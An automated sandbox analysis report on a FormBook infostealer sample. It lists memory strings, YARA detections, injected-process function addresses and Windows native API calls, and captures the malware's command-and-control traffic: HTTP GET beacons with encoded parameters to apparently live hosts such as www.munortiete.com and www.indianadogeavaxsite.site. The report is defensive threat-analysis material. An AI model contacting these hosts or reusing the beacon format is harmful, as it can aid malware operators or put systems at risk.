          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253704425.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com3
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.253864499.0000000006043000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com9
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.250514753.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kra-e#
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.252797134.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252833728.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comw
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.259240750.0000000006047000.00000004.00000001.sdmp, TPJX2QwEdXs5sTV.exe, 00000001.00000003.256166829.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.256226500.0000000006041000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deA
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.284564270.0000000007232000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn0
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cncom
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnk
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.E
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252524764.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cno.U
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000003.252145677.000000000603B000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue
          Source: cmd.exe, 00000017.00000002.521651760.0000000003C32000.00000004.00020000.sdmpString found in binary or memory: https://www.438451.com/t75f/?IL3h=1BeMm2dWByn9xv9J99R2XzKkk0MJMO8GKUMNYM3ZZNvYMz7ACarE0KIXHaUrAW4HLV
          Source: unknownDNS traffic detected: queries for: www.ice-lemon.pro
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=sM7Ty9CQqazxDsp1L2wp1X0yz6j8iZQMubl0W4soZskD9oW6nOghj7d5yalvsy0iKmR0GSiRBw==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.indianadogeavaxsite.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t75f/?IL3h=1LVEWTKjgk7dQQTcgX7ekf6vWGvALEiRfuym9xfNfV6ZlhpaQ60NuXtsMiMogZeeqS9jy4XPVA==&_hN0=5jFT8RbH3tHLZn HTTP/1.1Host: www.munortiete.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TPJX2QwEdXs5sTV.exe.4175e30.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2068
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA4190
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA28D0
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA28CE
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2059
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2510
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA6D08
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2501
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2ACF
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA0388
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA037A
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_04FA2B0F
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CE5CA
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CE5D8
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeCode function: 1_2_054CBC34
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401027
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041C94A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041BB99
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041A6AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F7B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01021002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F84120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F6F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F9EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01031D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F60D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00F86E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008748E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00895CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00879CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087D803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087E040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00877190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_008931DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00893506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00886550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00881969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00878AD7
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00875226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087FA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00875E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00885FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00896FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087CB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035DEBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C6E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03671D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035AF900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035A0D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035C4120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BD5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035B841F
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_03661002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035BB090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 035AB150 appears 32 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0088374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004185C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00418670 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004186F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004187A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041866C NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004186EA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA98A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAB040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA99D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAA3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA95F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FA9560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00FAAD30 NtSetContextThread,
